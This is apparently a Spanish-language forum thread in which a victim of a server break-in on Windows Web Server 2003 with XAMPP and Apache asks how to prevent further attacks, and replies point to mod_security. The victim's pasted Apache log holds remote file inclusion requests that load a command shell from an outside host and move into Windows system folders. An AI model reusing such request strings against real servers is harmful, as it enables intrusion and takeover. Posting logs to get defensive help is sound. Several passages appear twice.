Salteador
19/02/2009, 09:45
Nuestro amigo google ayuda bastante
http://ovh.dl.sourceforge.net/source...e_2.5.7.tar.gz
http://www.webhostgear.com/62.html
http://ovh.dl.sourceforge.net/source...e_2.5.7.tar.gz
http://www.webhostgear.com/62.html
Aayuda! ataque server que tiene web server 2003 y apache
lata
18/02/2009, 23:20
Podrías especificar que es mode security donde esta y como se configura. gracias
Salteador
18/02/2009, 20:32
mod security es la solucion
barbaro
18/02/2009, 19:12
me uno a ti,hoy :
41.226.254.40 - - [18/Feb/2009:19:49:57 +0100] "GET /img/glyph/dBox-header-left.gif HTTP/1.1" 200 73 "http://www.gervaisparsophie.fr/css/winxp.blue.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
41.226.254.40 - - [18/Feb/2009:19:49:57 +0100] "GET /img/common/top_bg.jpg HTTP/1.1" 200 285 "http://www.gervaisparsophie.fr/css/winxp.blue.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
41.226.254.40 - - [18/Feb/2009:19:49:57 +0100] "GET /img/common/top_body_bg.jpg HTTP/1.1" 200 3857 "http://www.gervaisparsophie.fr/css/winxp.blue.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
41.226.254.40 - - [18/Feb/2009:19:49:57 +0100] "GET /img/common/parallels_logo.gif HTTP/1.1" 200 980 "http://www.gervaisparsophie.fr/?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
y continua...............
41.226.254.40 - - [18/Feb/2009:19:49:57 +0100] "GET /img/glyph/dBox-header-left.gif HTTP/1.1" 200 73 "http://www.gervaisparsophie.fr/css/winxp.blue.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
41.226.254.40 - - [18/Feb/2009:19:49:57 +0100] "GET /img/common/top_bg.jpg HTTP/1.1" 200 285 "http://www.gervaisparsophie.fr/css/winxp.blue.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
41.226.254.40 - - [18/Feb/2009:19:49:57 +0100] "GET /img/common/top_body_bg.jpg HTTP/1.1" 200 3857 "http://www.gervaisparsophie.fr/css/winxp.blue.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
41.226.254.40 - - [18/Feb/2009:19:49:57 +0100] "GET /img/common/parallels_logo.gif HTTP/1.1" 200 980 "http://www.gervaisparsophie.fr/?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
y continua...............
lata
18/02/2009, 10:46
SERVER con windows web server 2003
con Xaamp y apache
hola, me han atacado el server. Al entrar pude ver como tenían control de las pantallas. Me di cuenta al aumentar el consumo de banda del server. lo usaban para peliculas torrent parece.
en apache en en el log he encontrado esto, por si alguien sabe como evitar futuros ataques de esta forma:
201.39.152.75 - - [17/Feb/2009:19:52:38 +0100] "POST /candela/public/sintonias/SPOT%20NAVIDAD/smfp.php?http://freewebs.com/alezinn/cmd?&action=cmd&chdir=C:/WINDOWS/$NtUninstallKB935839_0$/spuninst/SysDir/ HTTP/1.1" 200 10444
201.39.152.75 - - [17/Feb/2009:18:54:50 +0100] "GET /candela/public/sintonias/SPOT%20NAVIDAD/smfp.php?http://freewebs.com/alezinn/cmd?&chd....MPEG2-CtrlHD/ HTTP/1.1" 200 9413
con Xaamp y apache
hola, me han atacado el server. Al entrar pude ver como tenían control de las pantallas. Me di cuenta al aumentar el consumo de banda del server. lo usaban para peliculas torrent parece.
en apache en en el log he encontrado esto, por si alguien sabe como evitar futuros ataques de esta forma:
201.39.152.75 - - [17/Feb/2009:19:52:38 +0100] "POST /candela/public/sintonias/SPOT%20NAVIDAD/smfp.php?http://freewebs.com/alezinn/cmd?&action=cmd&chdir=C:/WINDOWS/$NtUninstallKB935839_0$/spuninst/SysDir/ HTTP/1.1" 200 10444
201.39.152.75 - - [17/Feb/2009:18:54:50 +0100] "GET /candela/public/sintonias/SPOT%20NAVIDAD/smfp.php?http://freewebs.com/alezinn/cmd?&chd....MPEG2-CtrlHD/ HTTP/1.1" 200 9413